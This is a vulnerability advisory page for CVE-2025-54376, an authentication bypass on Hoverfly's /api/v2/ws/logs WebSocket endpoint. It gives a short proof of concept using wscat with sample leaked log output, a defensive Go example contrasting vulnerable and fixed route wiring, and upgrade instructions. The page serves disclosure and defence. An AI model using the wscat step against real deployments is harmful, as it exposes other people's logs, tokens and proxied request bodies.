CVE-2025-54376

high
Published 2025-09-10 · Modified 2026-03-03
CVSS v3
7.5
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVSS v4
7.8
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
VIR risk
7.5

Description

WebSocket endpoint `/api/v2/ws/logs` reachable without authentication even when --auth is enabled in github.com/SpectoLabs/hoverfly

Predictions

Exploit likelihood
83%
Patch ETA

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

Mitigation details

Source: GitHub Security Advisory (CC-BY-4.0)


WebSocket endpoint `/api/v2/ws/logs` reachable without authentication even when --auth is enabled

Summary

Hoverfly’s admin WebSocket endpoint /api/v2/ws/logs is not protected by the same authentication middleware that guards the REST admin API. Consequently, an unauthenticated remote attacker can:

- Stream real-time application logs (information disclosure).
- Gain insight into internal file paths, request/response bodies, and other potentially sensitive data emitted in logs.

PoC

1. Start Hoverfly with authentication enabled:

./hoverfly -auth

2. Confirm that the REST API requires credentials:

curl -i http://localhost:8888/api/v2/hoverfly/version

3. Connect to the WebSocket endpoint without credentials:

wscat -c ws://localhost:8888/api/v2/ws/logs
# Connected (press CTRL+C to quit)
# … logs stream immediately … (you need to send a message to start receiving the stream)

wscat -c ws://localhost:8888/api/v2/ws/logs
Connected (press CTRL+C to quit)
> hi!
< {"logs":[{"level":"info","msg":"Log level set to verbose","time":"2025-07-20T17:07:00+05:30"},{"level":"info","msg":"Using memory backend","time":"2025-07-20T17:07:00+05:30"},{"level":"info","msg":"User added successfully","time":"2025-07-20T17:07:00+05:30","username":""},{"level":"info","msg":"Enabling proxy authentication","time":"2025-07-20T17:07:00+05:30"},{"Destination":".","Mode":"simulate","ProxyPort":"8500","level":"info","msg":"Proxy prepared...","time":"2025-07-20T17:07:00+05:30"},{"destination":".","level":"info","mode":"simulate","msg":"current proxy configuration","port":"8500","time":"2025-07-20T17:07:00+05:30"},{"level":"info","msg":"serving proxy","time":"2025-07-20T17:07:00+05:30"},{"AdminPort":"8888","level":"info","msg":"Admin interface is starting...","time":"2025-07-20T17:07:00+05:30"},{"level":"debug","message":"hi!","msg":"Got message...","time":"2025-07-20T17:09:04+05:30"}]}
< ...
< ...

Impact

Authentication bypass; an attacker receives full application logs, including proxied request/response bodies, tokens, file paths, etc.
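The root cause described above is a routing mistake: the WebSocket log route is registered outside the authentication middleware that wraps the REST admin routes, so `--auth` never applies to it. The Go program below is an added example, not Hoverfly's own code. It models a tiny admin mux in both states (WebSocket handler unwrapped, then wrapped) and a `probe` helper that a regression test can use to assert that every admin route answers 401 to anonymous callers. The bearer token, the handler names and the stub WebSocket handler (which only checks the upgrade header and answers 101 without hijacking the connection) are assumptions of the example.

```go
package main

import (
	"crypto/subtle"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// demoToken is a constructed credential for this example only; it is not
// how Hoverfly stores or checks admin users.
const demoToken = "demo-admin-token"

// requireAuth stands in for the admin API's authentication middleware.
// The check runs before the wrapped handler, so a WebSocket handler behind
// it can never reach the upgrade/hijack step anonymously.
func requireAuth(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		got := []byte(r.Header.Get("Authorization"))
		want := []byte("Bearer " + demoToken)
		if subtle.ConstantTimeCompare(got, want) != 1 {
			w.Header().Set("WWW-Authenticate", `Bearer realm="admin"`)
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// logsWS is a stub for the log-streaming WebSocket handler: it validates the
// upgrade handshake and answers 101. A real handler would hijack the
// connection here and start pushing log records.
func logsWS(w http.ResponseWriter, r *http.Request) {
	if !strings.EqualFold(r.Header.Get("Upgrade"), "websocket") {
		http.Error(w, "expected websocket upgrade", http.StatusBadRequest)
		return
	}
	w.WriteHeader(http.StatusSwitchingProtocols)
}

// version is a stand-in REST admin route.
func version(w http.ResponseWriter, r *http.Request) {
	fmt.Fprint(w, `{"version":"example"}`)
}

// vulnerableMux reproduces the flaw class: REST routes are wrapped, but the
// WebSocket route is registered on the mux directly and never sees requireAuth.
func vulnerableMux() http.Handler {
	mux := http.NewServeMux()
	mux.Handle("/api/v2/hoverfly/version", requireAuth(http.HandlerFunc(version)))
	mux.Handle("/api/v2/ws/logs", http.HandlerFunc(logsWS)) // BUG: not wrapped
	return mux
}

// fixedMux wraps every admin route, the WebSocket one included.
func fixedMux() http.Handler {
	mux := http.NewServeMux()
	mux.Handle("/api/v2/hoverfly/version", requireAuth(http.HandlerFunc(version)))
	mux.Handle("/api/v2/ws/logs", requireAuth(http.HandlerFunc(logsWS)))
	return mux
}

// probe sends one in-memory request to h and returns the status code.
// token == "" means an anonymous caller; websocket adds the upgrade headers.
func probe(h http.Handler, path, token string, websocket bool) int {
	req := httptest.NewRequest(http.MethodGet, path, nil)
	if token != "" {
		req.Header.Set("Authorization", "Bearer "+token)
	}
	if websocket {
		req.Header.Set("Connection", "Upgrade")
		req.Header.Set("Upgrade", "websocket")
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	for _, c := range []struct {
		name string
		h    http.Handler
	}{{"vulnerable", vulnerableMux()}, {"fixed", fixedMux()}} {
		fmt.Printf("%-10s anonymous REST=%d  anonymous WS=%d  authed WS=%d\n", c.name,
			probe(c.h, "/api/v2/hoverfly/version", "", false),
			probe(c.h, "/api/v2/ws/logs", "", true),
			probe(c.h, "/api/v2/ws/logs", demoToken, true))
	}
}
```

The useful defender habit here is the `probe` loop: enumerate every route on the admin mux, including upgrade-style routes, and assert in CI that anonymous requests get 401. A middleware that is applied per-route, as in `vulnerableMux`, silently misses any route added later; wrapping the whole mux (or a router group) is the safer shape.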

Fix

Upgrade github.com/SpectoLabs/hoverfly to 1.12.0 (Go module versions carry the `v` prefix):

go get github.com/SpectoLabs/hoverfly@v1.12.0

Affected

| Vendor | Product | Version |
|---|---|---|
| go | github.com/SpectoLabs/hoverfly | < 1.12.0 |

Package impact

| Ecosystem | Package | Vulnerable | Fixed |
|---|---|---|---|
| Go (golang) | github.com/SpectoLabs/hoverfly | < 1.12.0 | 1.12.0 |

Application impact

| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| hoverfly | hoverfly | `{"endExcluding":"1.12.0"}` | 1.12.0 |

References

CWEs

CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor), CWE-287 (Improper Authentication), CWE-532 (Insertion of Sensitive Information into Log File)
